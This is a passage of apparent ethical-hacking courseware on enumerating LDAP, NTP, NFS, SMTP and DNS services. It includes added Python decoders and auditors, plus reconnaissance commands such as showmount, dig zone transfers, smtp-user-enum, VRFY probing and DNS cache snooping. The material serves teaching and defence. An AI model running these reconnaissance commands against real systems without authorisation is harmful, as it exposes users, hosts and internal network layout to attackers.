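"""Added example: decode BER-framed SNMP messages and LDAP bind requests."""
from typing import Any, Dict, List, Tuple

DEFAULT_COMMUNITIES = {"public", "private"}      # read / read-write defaults
SNMP_VERSIONS = {0: "v1", 1: "v2c", 3: "v3"}
SNMP_PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse",
                  0xA3: "SetRequest", 0xA4: "Trap"}
LDAP_BIND_REQUEST = 0x60                          # [APPLICATION 0], constructed
LDAP_SIMPLE_AUTH = 0x80                           # authentication CHOICE simple [0]


def read_tlv(data: bytes, pos: int = 0) -> Tuple[int, bytes, int]:
    """Return (tag, value, position after the element) for the BER TLV at pos."""
    tag, length, pos = data[pos], data[pos + 1], pos + 2
    if length & 0x80:                             # long form: low bits count length bytes
        count = length & 0x7F
        length = int.from_bytes(data[pos:pos + count], "big")
        pos += count
    return tag, data[pos:pos + length], pos + length


def ber_int(value: bytes) -> int:
    return int.from_bytes(value, "big", signed=True)


def decode_oid(value: bytes) -> str:
    """Base-128 sub-identifiers; the first byte packs the first two arcs (40*a + b)."""
    arcs, acc = [value[0] // 40, value[0] % 40], 0
    for byte in value[1:]:
        acc = (acc << 7) | (byte & 0x7F)
        if not byte & 0x80:                       # high bit clear ends the sub-identifier
            arcs.append(acc)
            acc = 0
    return ".".join(map(str, arcs))


def parse_snmp(packet: bytes) -> Dict[str, Any]:
    """SNMPv1/v2c message: SEQUENCE { INTEGER version, OCTET STRING community, PDU }."""
    tag, body, _ = read_tlv(packet)
    if tag != 0x30:
        raise ValueError("SNMP message must be a SEQUENCE")
    _, version, pos = read_tlv(body)
    _, community, pos = read_tlv(body, pos)       # sent in cleartext on the wire
    pdu_tag, pdu, _ = read_tlv(body, pos)
    pos = 0
    for _ in range(3):                            # request-id, error-status, error-index
        _, _, pos = read_tlv(pdu, pos)
    _, varbinds, _ = read_tlv(pdu, pos)
    oids: List[str] = []
    pos = 0
    while pos < len(varbinds):
        _, varbind, pos = read_tlv(varbinds, pos)
        _, oid_bytes, _ = read_tlv(varbind)       # each VarBind = SEQUENCE { OID, value }
        oids.append(decode_oid(oid_bytes))
    name = community.decode("ascii", "replace")
    return {"version": SNMP_VERSIONS.get(ber_int(version), "unknown"),
            "community": name, "default_community": name in DEFAULT_COMMUNITIES,
            "pdu": SNMP_PDU_NAMES.get(pdu_tag, hex(pdu_tag)), "oids": oids}


def parse_ldap_bind(packet: bytes) -> Dict[str, Any]:
    """LDAPMessage: SEQUENCE { INTEGER messageID, BindRequest { version, name, auth } }."""
    tag, body, _ = read_tlv(packet)
    if tag != 0x30:
        raise ValueError("LDAPMessage must be a SEQUENCE")
    _, msg_id, pos = read_tlv(body)
    op_tag, op, _ = read_tlv(body, pos)
    if op_tag != LDAP_BIND_REQUEST:
        raise ValueError("not a BindRequest")
    _, version, pos = read_tlv(op)
    _, name, pos = read_tlv(op, pos)
    auth_tag, credential, _ = read_tlv(op, pos)
    simple = auth_tag == LDAP_SIMPLE_AUTH
    return {"message_id": ber_int(msg_id), "ldap_version": ber_int(version),
            "bind_dn": name.decode("utf-8", "replace"), "simple_auth": simple,
            "anonymous_bind": simple and name == b"" and credential == b""}


def tlv(tag: int, value: bytes) -> bytes:        # constructed samples: short-form lengths suffice
    return bytes([tag, len(value)]) + value


def encode_oid(oid: str) -> bytes:
    arcs = [int(a) for a in oid.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        while arc >> 7:
            arc >>= 7
            chunk.insert(0, 0x80 | (arc & 0x7F))
        out.extend(chunk)
    return bytes(out)


def snmp_get(community: bytes, oid: str, version_field: int = 0) -> bytes:
    """GetRequest for one OID; version_field 0 = SNMPv1, 1 = SNMPv2c."""
    varbind = tlv(0x30, tlv(0x06, encode_oid(oid)) + tlv(0x05, b""))
    pdu = tlv(0xA0, tlv(0x02, b"\x01") + tlv(0x02, b"\x00") + tlv(0x02, b"\x00")
              + tlv(0x30, varbind))
    return tlv(0x30, tlv(0x02, bytes([version_field])) + tlv(0x04, community) + pdu)


def ldap_bind(dn: bytes, password: bytes, message_id: int = 1) -> bytes:
    op = tlv(0x02, b"\x03") + tlv(0x04, dn) + tlv(LDAP_SIMPLE_AUTH, password)
    return tlv(0x30, tlv(0x02, bytes([message_id])) + tlv(LDAP_BIND_REQUEST, op))


SYS_DESCR = "1.3.6.1.2.1.1.1.0"                   # assumed MIB-II sysDescr OID for samples
```

Run parse_snmp(snmp_get(b"public", SYS_DESCR)) and parse_ldap_bind(ldap_bind(b"", b"")) to see a default-community request and an anonymous bind flagged.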
LDAP Enumeration Tools

There are many LDAP enumeration tools that access the directory listings within Active Directory or other directory services. By using these tools, attackers can enumerate information such as valid usernames, addresses, and departmental details from different LDAP servers.

- Softerra LDAP Administrator

Source: https://www.ldapadministrator.com

Softerra LDAP Administrator is an LDAP administration tool that works with LDAP servers such as Active Directory, Novell Directory Services, and Netscape/iPlanet. It browses and manages LDAP directories. As shown in the screenshot, attackers use Softerra LDAP Administrator to enumerate user details such as first name, last name, email address, designation, office location, and telephone number.

The following are some additional LDAP enumeration tools:
- LDAP Admin Tool (https://www.ldapsoft.com)
- LDAP Account Manager (https://www.ldap-account-manager.org)
- LDAP Search (https://securityxploded.com)
- JXplorer (http://www.jxplorer.org)
- Active Directory Explorer (AD Explorer) (https://docs.microsoft.com)
NTP and NFS Enumeration

Administrators often overlook the Network Time Protocol (NTP) server when considering security. However, if queried properly, it can provide valuable network information to an attacker. Therefore, it is necessary to know what information an attacker can obtain about a network through NTP enumeration. The Network File System (NFS) is used for the management of remote file access. NFS enumeration helps attackers to gather information such as a list of clients connected to the NFS server, along with their IP addresses, and exported directories.

This section describes NTP enumeration, the information extracted via NTP enumeration, various NTP enumeration commands, NTP enumeration tools, and NFS enumeration techniques and tools.
NTP Enumeration

NTP is designed to synchronize clocks of networked computers. It uses UDP port 123 as its primary means of communication. NTP can maintain time within an error of 10 ms over the public Internet. Furthermore, it can achieve an accuracy of 200 µs or better in LANs under ideal conditions.

The following are some pieces of information an attacker can obtain by querying an NTP server:
- List of hosts connected to the NTP server
- Clients' IP addresses in the network, their system names, and OSs
- Internal IPs, if the NTP server is in the demilitarized zone (DMZ)
NTP Enumeration Commands

NTP enumeration commands such as ntpdate, ntptrace, ntpdc, and ntpq are used to query an NTP server for valuable information.

- ntpdate

This command collects the number of time samples from several time sources. Its syntax is as follows:

ntpdate [-46bBdqsuv] [-a key] [-e authdelay] [-k keyfile] [-o version] [-p samples] [-t timeout] [-U user_name] server [...]

- -4: Force DNS resolution of given hostnames to the IPv4 namespace
- -6: Force DNS resolution of given hostnames to the IPv6 namespace
- -a key: Enable the authentication function/specify the key identifier to be used for authentication
- -B: Force the time to always be slewed
- -b: Force the time to be stepped
- -d: Enable debugging mode
- -e authdelay: Specify the processing delay to perform an authentication function
- -k keyfile: Specify the path for the authentication key file as the string "keyfile"; the default is /etc/ntp/keys
- -o version: Specify the NTP version for outgoing packets as an integer version, which can be 1 or 2; the default is 4
- -p samples: Specify the number of samples to be acquired from each server, with values ranging from 1-8; the default is 4
- -q: Query only; do not set the clock
- -s: Divert logging output from the standard output (default) to the system syslog facility
- -t timeout: Specify the maximum wait time for a server response; the default is 1 s
- -u: Use an unprivileged port for outgoing packets
- -v: Be verbose; logs ntpdate's version identification string

Table 4.4: ntpdate parameters and their respective functions

Figure 4.12: Screenshot of the ntpdate command, showing debugging information for a given
- ntptrace

This command determines where the NTP server obtains the time from and follows the chain of NTP servers back to its primary time source. Attackers use this command to trace the list of NTP servers connected to the network. Its syntax is as follows:

ntptrace [-n] [-m maxhosts] [servername/IP_address]

- -n: Do not print hostnames and show only IP addresses; may be useful if a name server is down
- -m maxhosts: Set the maximum number of levels up the chain to be followed

Table 4.5: ntptrace parameters and their respective functions
Example:

# ntptrace
localhost: stratum 4, offset 0.0019529, synch distance 0.143235
10.10.0.1: stratum 2, offset 0.0114273, synch distance 0.115554
10.10.1.1: stratum 1, offset 0.0017698, synch distance 0.011193

- ntpdc

This command queries the ntpd daemon about its current state and requests changes in that state. Attackers use this command to retrieve the state and statistics of each NTP server connected to the target network. Its syntax is as follows:

ntpdc [-ilnps] [-c command] [hostname/IP_address]

- -c: Following argument interpreted as an interactive format command; multiple options may be given
- -i: Force ntpdc to operate in the interactive mode
- -l: Obtain a list of peers known to the server(s); this switch is equivalent to -c listpeers
- -n: Output all host addresses in the dotted-quad numeric format, rather than hostnames
- -p: Print a list of the peers as well as a summary of their states; this is equivalent to -c peers
- -s: Print a list of the peers as well as a summary of their states, but in a slightly different format than the -p switch; this is equivalent to -c dmpeers

Table 4.6: ntpdc parameters and their respective functions

Figure 4.13: Screenshot of the ntpdc command
- ntpq

This command monitors the operations of the NTP daemon ntpd and determines performance. Its syntax is as follows:

ntpq [-inp] [-c command] [host/IP_address]

- -c: Following argument is an interactive format command; multiple options may be given
- -d: Debugging mode
- -i: Force ntpq to operate in the interactive mode
- -n: Output all host addresses in the dotted-quad numeric format, rather than hostnames
- -p: Print a list of the peers as well as a summary of their states

Example:

ntpq> version
ntpq 4.2.8p10@1.3728-o
ntpq> host
current host is localhost

Figure 4.14: Screenshot of ntpq command
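The stratum, offset and synch distance that ntptrace prints above come from fields of the 48-byte NTP packet and from the four timestamps of one request/reply exchange. As an added example, not code from the courseware, the following decodes a constructed server reply, checks it the way a careful client does before trusting it (mode 4, origin timestamp equal to the request's transmit time, usable stratum), and computes the clock offset and round-trip delay with the RFC 5905 formulas. The timestamps and root delay/dispersion values are constructed; treating "synch distance" as root delay/2 + root dispersion is an assumption about what ntptrace reports.

```python
"""Added example: decode an NTP server reply and derive offset, delay and synch distance."""
import struct
from typing import Dict, Tuple

NTP_PACKET = struct.Struct("!BBBbIIIQQQQ")   # 48-byte header, RFC 5905 layout
MODE_SERVER = 4


def ntp_ts(seconds: int, fraction_ms: float = 0.0) -> int:
    """64-bit NTP timestamp: seconds since 1900 in the high word, fraction in the low word."""
    return (seconds << 32) | int(round(fraction_ms / 1000 * 2 ** 32))


def short_to_seconds(raw: int) -> float:
    """NTP short format (root delay / dispersion): 16-bit seconds, 16-bit fraction."""
    return (raw >> 16) + (raw & 0xFFFF) / 2 ** 16


def parse_ntp(packet: bytes) -> Dict[str, int]:
    if len(packet) < NTP_PACKET.size:
        raise ValueError("NTP packet shorter than 48 bytes")
    (flags, stratum, poll, precision, root_delay, root_disp, ref_id,
     ref_ts, org_ts, rec_ts, xmt_ts) = NTP_PACKET.unpack_from(packet)
    return {"leap": flags >> 6, "version": (flags >> 3) & 0x7, "mode": flags & 0x7,
            "stratum": stratum, "poll": poll, "precision": precision,
            "root_delay": short_to_seconds(root_delay),
            "root_dispersion": short_to_seconds(root_disp), "ref_id": ref_id,
            "ref_ts": ref_ts, "org_ts": org_ts, "rec_ts": rec_ts, "xmt_ts": xmt_ts}


def validate_reply(reply: Dict[str, int], t1: int) -> str:
    """Empty string if the reply may be used, otherwise the reason to discard it."""
    if reply["mode"] != MODE_SERVER:
        return f"unexpected mode {reply['mode']}"
    if reply["org_ts"] != t1:
        # A reply whose origin timestamp is not our own transmit time was not an
        # answer to our request: drop it rather than let it steer the clock.
        return "origin timestamp does not match our request"
    if reply["stratum"] == 0 or reply["stratum"] > 15:
        return "stratum 0 (kiss-o'-death) or 16 (unsynchronized) reply"
    return ""


def offset_and_delay(reply: Dict[str, int], t1: int, t4: int) -> Tuple[float, float]:
    """RFC 5905: offset = ((T2 - T1) + (T3 - T4)) / 2, delay = (T4 - T1) - (T3 - T2)."""
    reason = validate_reply(reply, t1)
    if reason:
        raise ValueError(reason)
    t2, t3 = reply["rec_ts"], reply["xmt_ts"]    # integer 2^-32 s units: exact arithmetic
    offset = ((t2 - t1) + (t3 - t4)) / 2 / 2 ** 32
    delay = ((t4 - t1) - (t3 - t2)) / 2 ** 32
    return offset, delay


def synch_distance(reply: Dict[str, int]) -> float:
    """Assumed ntptrace-style root distance: root delay / 2 + root dispersion."""
    return reply["root_delay"] / 2 + reply["root_dispersion"]


# Constructed exchange: the client clock is 2 ms behind the server, one-way delay is
# 10 ms each way, and the server spends 1 ms between receiving and transmitting.
T1 = ntp_ts(3_900_000_000)                     # client transmit (client clock)
T2 = ntp_ts(3_900_000_000, 12.0)               # server receive (server clock, +2 ms)
T3 = ntp_ts(3_900_000_000, 13.0)               # server transmit
T4 = ntp_ts(3_900_000_000, 21.0)               # client receive (client clock)

SERVER_REPLY = NTP_PACKET.pack(
    (0 << 6) | (4 << 3) | MODE_SERVER,         # LI=0, VN=4, mode=4 (server)
    2, 6, -20,                                 # stratum 2, poll 2^6 s, precision 2^-20 s
    int(0.020 * 2 ** 16), int(0.010 * 2 ** 16),  # root delay 20 ms, root dispersion 10 ms
    0x0A0A0101,                                # reference ID: upstream 10.10.1.1 (constructed)
    ntp_ts(3_899_999_900), T1, T2, T3)


def analyze_reply(packet: bytes = SERVER_REPLY, t1: int = T1, t4: int = T4) -> Dict[str, float]:
    reply = parse_ntp(packet)
    offset, delay = offset_and_delay(reply, t1, t4)
    return {"stratum": reply["stratum"], "offset": offset, "delay": delay,
            "synch_distance": synch_distance(reply)}


if __name__ == "__main__":
    r = analyze_reply()
    print(f"stratum {r['stratum']}, offset {r['offset']:.6f}, delay {r['delay']:.6f}, "
          f"synch distance {r['synch_distance']:.6f}")
```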
NTP Enumeration Tools

NTP enumeration tools are used to monitor the working of NTP and SNTP servers in the network and help in the configuration and verification of connectivity from the time client to the NTP servers.

- PRTG Network Monitor

Source: https://www.paessler.com

PRTG monitors all systems, devices, traffic, and applications of IT infrastructure by using various technologies such as SNMP, WMI, and SSH. As shown in the screenshot, attackers use PRTG Network Monitor to retrieve SNTP server details such as the response time from the server, active sensors with the server, and synchronization time.

Figure 4.15: Screenshot of PRTG Network Monitor

The following are some NTP enumeration tools:
- Nmap (https://nmap.org)
- Wireshark (https://www.wireshark.org)
- udp-proto-scanner (https://labs.portcullis.co.uk)
- NTP Server Scanner (http://www.bytefusion.com)
NFS Enumeration

NFS is a type of file system that enables users to access, view, store, and update files over a remote server. These remote data can be accessed by the client in the same way as they are accessed on the local system. Depending on the privileges assigned to the clients, they can either read the data only or both read and write the data.

An NFS system is generally implemented on a computer network in which the centralization of data is required for critical resources. The remote procedure call (RPC) is used to route and process the request between clients and servers.

To accomplish the task of sharing files and directories over the network, the "exporting" process is used. However, the client first attempts to make the file available for sharing by using the "mounting" process. The /etc/exports location on the NFS server contains a list of clients allowed to share files on the server. In this approach, to access the server, the only credential used is the client's IP address. NFS versions before version 4 run on the same security specification.

Enumerating NFS services enables attackers to identify the exported directories, the list of clients connected to the NFS server along with their IP addresses, and the shared data associated with the IP addresses. After gathering this information, the attackers can spoof their IP addresses to gain full access to the shared files on the server.

As shown in the screenshot, an attacker runs the following rpcinfo command to scan the target IP address for an open NFS port (port 2049) and the NFS services running on it:

rpcinfo -p 10.10.10.16
Figure 4.16: Screenshot of rpcinfo displaying open NFS port and services

As shown in the screenshot, an attacker runs the following command to view the list of shared files and directories:

showmount -e 10.10.10.16

Figure 4.17: Screenshot of the showmount command displaying shared directory

Further, an attacker can use various other commands and tools to gain access to the NFS server and upload malicious files on the server to launch further attacks.
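The text above notes that /etc/exports lists the permitted clients and that, before NFSv4, the client IP address is the only credential checked. As an added example (not from the courseware), the following parses a constructed /etc/exports and reports what showmount -e would reveal to anyone: exports open to every host, no_root_squash, insecure ports, exports relying on AUTH_SYS (IP-only trust) rather than Kerberos, and the whitespace-before-parenthesis mistake that silently applies the options to all hosts. The paths, addresses and options in the sample are constructed.

```python
"""Added example: audit /etc/exports for IP-only trust and risky export options."""
import re
from typing import Dict, List, Tuple

# Constructed sample; the 10.10.10.x addresses echo the page's lab, nothing is real.
SAMPLE_EXPORTS = """\
# constructed /etc/exports for the example
/srv/backup   10.10.10.0/24(rw,sync,no_root_squash)
/srv/public   *(ro,sync)
/home         10.10.10.0/24 (rw)
/srv/secure   10.10.10.16(rw,sync,sec=krb5p)
"""

# client(opts) | bare (opts) | bare client
TOKEN_RE = re.compile(r"[^\s(]+\([^)]*\)|\([^)]*\)|[^\s(]+")


def split_clients(rest: str) -> List[Tuple[str, List[str]]]:
    """Split 'client(opts) client2 (opts)' into (client, [options]) pairs.

    A bare '(opts)' token keeps an empty client name so the caller can see that
    the options were detached from the client that precedes them.
    """
    pairs = []
    for token in TOKEN_RE.findall(rest):
        client, paren, opts = token.partition("(")
        options = [o for o in opts.rstrip(")").split(",") if o] if paren else []
        pairs.append((client, options))
    return pairs


def audit_exports(text: str) -> List[Dict[str, str]]:
    """Return one finding per risky (path, client) combination."""
    findings: List[Dict[str, str]] = []

    def add(path: str, client: str, issue: str, severity: str, detail: str) -> None:
        findings.append({"path": path, "client": client or "<any host>",
                         "issue": issue, "severity": severity, "detail": detail})

    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        if not line:
            continue
        fields = line.split(None, 1)
        path, rest = fields[0], (fields[1] if len(fields) > 1 else "")
        clients = split_clients(rest) or [("", [])]    # no client list means everyone
        for index, (client, options) in enumerate(clients):
            opts = set(options)
            world = client in ("", "*")
            if client == "" and index > 0:
                add(path, client, "space_before_options", "high",
                    "whitespace before '(' applies the options to every host; "
                    "the named client silently gets the defaults instead")
            if world and "rw" in opts:
                add(path, client, "world_rw", "high", "writable by any host")
            elif world:
                add(path, client, "world_ro", "medium", "readable by any host")
            if "no_root_squash" in opts:
                add(path, client, "no_root_squash", "high",
                    "root on the client is root on the export")
            if "insecure" in opts:
                add(path, client, "insecure_port", "medium",
                    "requests from unprivileged source ports are accepted")
            if not any(o.startswith("sec=krb5") for o in opts):
                add(path, client, "auth_sys_only", "info",
                    "AUTH_SYS: the client IP address is the only credential")
    return findings


if __name__ == "__main__":
    for f in audit_exports(SAMPLE_EXPORTS):
        print(f"{f['severity']:6} {f['path']:12} {f['client']:14} {f['issue']}: {f['detail']}")
```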
NFS Enumeration Tools

NFS enumeration tools scan a network within a given range of IP addresses or a single IP address to identify the NFS services running on it. These tools also assist in obtaining a list of RPC services using portmap, a list of NFS shares, and a list of directories accessible through NFS; further, they allow downloading a file shared through the NFS server. Attackers use tools such as RPCScan and SuperEnum to perform NFS enumeration.

- RPCScan

Source: https://github.com

RPCScan communicates with RPC services and checks misconfigurations on NFS shares. As shown in the screenshot, an attacker runs the following command to enumerate the target IP address for active NFS services:

python3 rpc-scan.py 10.10.10.19 --rpc

Figure 4.18: Screenshot of RPCScan displaying open NFS ports and services

- SuperEnum

Source: https://github.com

SuperEnum includes a script that performs the basic enumeration of any open port. As shown in the screenshot, an attacker uses the script ./superenum and then enters a text file name "Target.txt" having a target IP address or a list of IP addresses for enumeration.

Figure 4.19: Screenshot of SuperEnum running script

After scanning a target IP address, the script displays all the open ports, as shown in the below screenshot. Port 2049 has an NFS service running.

Figure 4.20: Screenshot of SuperEnum displaying open NFS port
SMTP and DNS Enumeration

This section describes enumeration techniques to extract information related to network resources. It also covers DNS enumeration techniques that yield information about the DNS servers and network infrastructure of the target organization. The section discusses both SMTP and DNS enumeration techniques, covering SMTP enumeration, the process of obtaining a list of valid users on an SMTP server, SMTP enumeration tools, DNS zone transfer, DNS cache snooping, and DNS zone walking.
SMTP Enumeration

Mail systems commonly use SMTP with POP3 and IMAP, which enable users to save messages in the server mailbox and download them from the server when necessary. SMTP uses mail exchange (MX) servers to direct mail via DNS. It runs on TCP port 25, 2525, or 587. SMTP provides the following three built-in commands.

- VRFY: Validates users

$ telnet 192.168.168.1 25
Trying 192.168.168.1...
Connected to 192.168.168.1
Escape character is '^]'
220 NYmailserver ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 NYmailserver Hello [10.0.0.86], pleased to meet you
VRFY Jonathan
250 Super-User <Jonathan@NYmailserver>
VRFY Smith
550 Smith... User unknown
* EXPN: Displays the actual delivery addresses of aliases and mailing lists
$ telnet 192.168.168.1 25
Trying 192.168.168.1
Connected to 192.168.168.1
Escape character is '^]'
HELO
501 HELO requires domain address
HELO x
250 NYmailserver Hello [10.0.0.86], pleased to meet you
EXPN Jonathan
250 Super-User <Jonathan@NYmailserver>
EXPN Smith
550 Smith... User unknown

* RCPT TO: Defines the recipients of the message
$ telnet 192.168.168.1 25
Trying 192.168.168.1
Connected to 192.168.168.1
Escape character is '^]'
220 NYmailserver ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 NYmailserver Hello [10.0.0.86], pleased to meet you
MAIL FROM:Jonathan
250 Jonathan... Sender ok
RCPT TO:Ryder
250 Ryder... Recipient ok
RCPT TO:Smith
550 Smith... User unknown
SMTP servers respond differently to VRFY, EXPN, and RCPT TO commands for valid and invalid users; therefore, valid users on the SMTP server can be determined. Attackers can directly interact with SMTP via the Telnet prompt and collect a list of valid users on the SMTP server. Administrators and pen testers can perform SMTP enumeration using command-line utilities such as Telnet and netcat or by using tools such as Metasploit, Nmap, NetScanTools Pro, and smtp-user-enum to collect a list of valid users, delivery addresses, message recipients, etc.
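The differing replies in the transcripts above are the whole basis of SMTP user enumeration. The following Python model, an added example that is not part of the courseware, reproduces a server's command handling with the leaky policy shown on this page beside a hardened policy (uniform 252 for VRFY, EXPN disabled, a per-connection limit on unknown recipients); the hostname, user directory and limit are constructed.

```python
"""Models the SMTP replies in the transcripts above: the 'leaky' policy answers
VRFY/EXPN/RCPT TO differently for known and unknown users, the 'hardened' policy
does not. Constructed example: HOSTNAME matches the page's transcripts, the
user directory and MAX_UNKNOWN_RCPT are made up."""
from dataclasses import dataclass
from typing import List, Optional

HOSTNAME = "NYmailserver"
DIRECTORY = {"jonathan": "Super-User", "ryder": "Ryder"}   # constructed local users
MAX_UNKNOWN_RCPT = 3   # hardened policy: drop the connection after this many bad RCPTs


def _local_part(arg: str, prefix: str) -> str:
    """Strip 'FROM:'/'TO:', angle brackets and any @domain from an address argument."""
    if arg.upper().startswith(prefix):
        arg = arg[len(prefix):]
    return arg.strip().strip("<>").split("@")[0]


@dataclass
class SmtpSession:
    hardened: bool
    greeted: bool = False
    sender: Optional[str] = None
    unknown_rcpts: int = 0
    closed: bool = False

    def handle(self, line: str) -> str:
        """Return the server reply to one client command line."""
        if self.closed:
            return f"421 {HOSTNAME} Connection already closed"
        verb, _, arg = line.strip().partition(" ")
        verb, arg = verb.upper(), arg.strip()
        if verb == "HELO":
            if not arg:
                return "501 HELO requires domain address"
            self.greeted = True
            return f"250 {HOSTNAME} Hello [10.0.0.86], pleased to meet you"
        if not self.greeted:
            return "503 Polite people say HELO first"
        if verb == "VRFY":
            return self._lookup(arg, "252 Cannot VRFY user; try RCPT to attempt delivery")
        if verb == "EXPN":
            return self._lookup(arg, "502 Sorry, we do not allow this operation")
        if verb == "MAIL":
            self.sender = _local_part(arg, "FROM:")
            return f"250 {self.sender}... Sender ok"
        if verb == "RCPT":
            return self._rcpt(_local_part(arg, "TO:"))
        if verb == "QUIT":
            self.closed = True
            return f"221 {HOSTNAME} closing connection"
        return "500 Command unrecognized"

    def _lookup(self, user: str, hardened_reply: str) -> str:
        """VRFY/EXPN: leaky replies reveal validity, hardened reply is the same for every name."""
        if self.hardened:
            return hardened_reply
        name = DIRECTORY.get(user.lower())
        return f"250 {name} <{user}@{HOSTNAME}>" if name else f"550 {user}... User unknown"

    def _rcpt(self, user: str) -> str:
        if self.sender is None:
            return "503 Need MAIL before RCPT"
        if user.lower() in DIRECTORY:
            return f"250 {user}... Recipient ok"
        self.unknown_rcpts += 1
        if self.hardened and self.unknown_rcpts >= MAX_UNKNOWN_RCPT:
            # Unknown recipients still have to be rejected, so the hardened policy
            # limits how many guesses a single connection gets before being dropped.
            self.closed = True
            return f"421 {HOSTNAME} Too many unknown recipients; closing connection"
        return f"550 {user}... User unknown"


def run(commands: List[str], hardened: bool) -> List[str]:
    """Feed client commands to one session and collect the replies in order."""
    session = SmtpSession(hardened=hardened)
    return [session.handle(c) for c in commands]


if __name__ == "__main__":
    probe = ["HELO x", "VRFY Jonathan", "VRFY Smith", "EXPN Jonathan",
             "MAIL FROM:Jonathan", "RCPT TO:Ryder", "RCPT TO:Smith",
             "RCPT TO:Jones", "RCPT TO:Brown", "RCPT TO:Davis"]
    for mode in (False, True):
        print("--- hardened" if mode else "--- leaky")
        for cmd, reply in zip(probe, run(probe, mode)):
            print(f"C: {cmd}\nS: {reply}")
```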

SMTP Enumeration Tools
SMTP enumeration tools are used to perform username enumeration. Attackers can use the usernames obtained from this enumeration to launch further attacks on other systems in the network.
* NetScanTools Pro
Source: https://www.netscantools.com
NetScanTools Pro's SMTP Email Generator tool tests the process of sending an email message through an SMTP server and can extract all the email header parameters, including confirm/urgent flags. Attackers use NetScanTools Pro for SMTP enumeration. Attackers also record the email session in a log file and then view the communications between NetScanTools Pro and the SMTP server in the log file.

Figure 4.21: Screenshot of NetScanTools Pro

* smtp-user-enum
Source: http://pentestmonkey.net
smtp-user-enum is a tool for enumerating OS-level user accounts on Solaris via the SMTP service (sendmail). Enumeration is performed by inspecting responses to VRFY, EXPN, and RCPT TO commands. As shown in the screenshot, smtp-user-enum needs to be passed a list of users and at least one target running an SMTP service. The syntax for using smtp-user-enum is as follows:
smtp-user-enum.pl [options] (-u username|-U file-of-usernames) (-t host|-T file-of-targets)
smtp-user-enum has the following options:
o -m n: Maximum number of processes (default: 5)
o -M mode: Specify the SMTP command to use for username guessing from among EXPN, VRFY, and RCPT TO (default: VRFY)
o -u user: Check if a user exists on the remote system
o -f addr: Specify the from email address to use for "RCPT TO" guessing (default: User@example.com)
o -D dom: Specify the domain to append to the supplied user list to create email addresses (default: none)
o -U file: Select the file containing usernames to check via the SMTP service
o -t host: Specify the server host running the SMTP service
o -T file: Select the file containing hostnames running the SMTP service
o -p port: Specify the TCP port on which the SMTP service runs (default: 25)
o -d: Debugging output
o -t n: Wait for a maximum of n seconds for the reply (default: 5)
o -v: Verbose
o -h: Help message
Figure 4.22: Screenshot of smtp-user-enum

DNS Enumeration Using Zone Transfer
DNS zone transfer is the process of transferring a copy of the DNS zone file from the primary DNS server to a secondary DNS server. In most cases, the primary DNS server maintains a backup or secondary server for redundancy, which holds all the information stored in the primary server. The DNS server uses zone transfer to distribute changes made to the main server to the secondary server(s).
An attacker performs DNS zone transfer enumeration to locate the DNS server and access records of the target organization. If the DNS server allows zone transfers, then attackers can perform DNS zone transfer to obtain DNS server names, hostnames, machine names, usernames, IP addresses, aliases, etc. assigned within a target domain.
In DNS enumeration using zone transfer, an attacker attempts to retrieve a copy of the entire zone file for a domain from the DNS server. Attackers can perform DNS zone transfer using tools such as nslookup, the dig command, and DNSRecon. If the DNS transfer setting is enabled on the target name server, it will provide the DNS information; else, it will return an error stating that it has failed or refused the zone transfer.
To perform a DNS zone transfer, the attacker sends a zone-transfer request to the DNS server pretending to be a client; the DNS server then sends a portion of its database as a zone to the attacker. This zone may contain a large amount of information about the zone network.

* dig Command
Attackers use the dig command on Linux-based systems to query the DNS name servers and retrieve information about the target host addresses, name servers, mail exchanges, etc. As shown in the screenshot, attackers use the following command to perform DNS zone transfer:
dig ns <target domain>
The above command retrieves all the DNS name servers of the target domain. Next, attackers use one of the name servers from the output of the above command to test whether the target DNS allows zone transfers. They use the following command for this purpose:
dig @<domain of name server> <target domain> axfr

Figure 4.23: Screenshot of Linux DNS zone transfer using dig command (the axfr request against the certifiedhacker.com name server ends with "Transfer failed.")
* nslookup Command
Source: https://docs.microsoft.com
Attackers use the nslookup command on Windows-based systems to query the DNS name servers and retrieve information about the target host addresses, name servers, mail exchanges, etc. As shown in the screenshot, attackers use the following command to perform DNS zone transfer:
nslookup
set querytype=soa
<target domain>
The above command sets the query type to the Start of Authority (SOA) record to retrieve administrative information about the DNS zone of the target domain certifiedhacker.com. The following command is used to attempt to transfer the zone of the specified name server:
ls -d <domain of name server>

Figure 4.24: Screenshot of Windows DNS zone transfer using the nslookup command
* DNSRecon
Source: https://github.com
Attackers use DNSRecon to check all NS records of the target domain for zone transfers. As shown in the screenshot, attackers use the following command for DNS zone transfer:
dnsrecon -t axfr -d <target domain>
In the above command, the -d option specifies the target domain, the -t option specifies the type of enumeration to be performed, and axfr is the type of enumeration in which all NS servers are tested for zone transfer.

Figure 4.25: Screenshot of DNS zone transfer using DNSRecon
DNS Cache Snooping
DNS cache snooping is a type of DNS enumeration technique in which an attacker queries the DNS server for a specific cached DNS record. By using this cached record, the attacker can determine the sites recently visited by the user. This information can further reveal important information such as the name of the owner of the DNS server, its service provider, the name of its vendor, and bank details. By using this information, the attacker can perform a social engineering attack on the target user. Attackers perform DNS cache snooping using various tools such as the dig command, DNS Snoop Dogg, and DNSRecon.
Attackers use the following two DNS cache snooping methods to snoop on a target domain.
* Non-recursive Method
In this method, to snoop on a DNS server, attackers send a non-recursive query by setting the Recursion Desired (RD) bit in the query header to zero. Attackers query the DNS cache for a specific DNS record such as A, CNAME, PTR, CERT, SRV, and MX. If the queried record is present in the DNS cache, the DNS server responds with the information, indicating that some user on the system has visited a specific domain. Otherwise, the DNS server responds with information about another DNS server that can return an answer to the query, or it replies with the root.hints file containing information about all root DNS servers.
Attackers use the dig command followed by the name/IP address of the DNS server, domain name, and type of DNS record file. The +norecurse option is used to set the query to non-recursive:
dig @<IP of DNS server> <Target domain> A +norecurse

As shown in the screenshot, the status NOERROR implies that the query was accepted but no answer was returned, thereby indicating that no user from the system had visited the queried site.
Figure 4.26: Screenshot of a dig query for a site that is not cached (the query is accepted, but the site is not cached)
* Recursive Method
In this method, to snoop on the DNS server, attackers send a recursive query by setting the +recurse option instead of the +norecurse option. Similar to the non-recursive method, the attackers query the DNS cache for a specific DNS record such as A, CNAME, PTR, CERT, SRV, and MX.
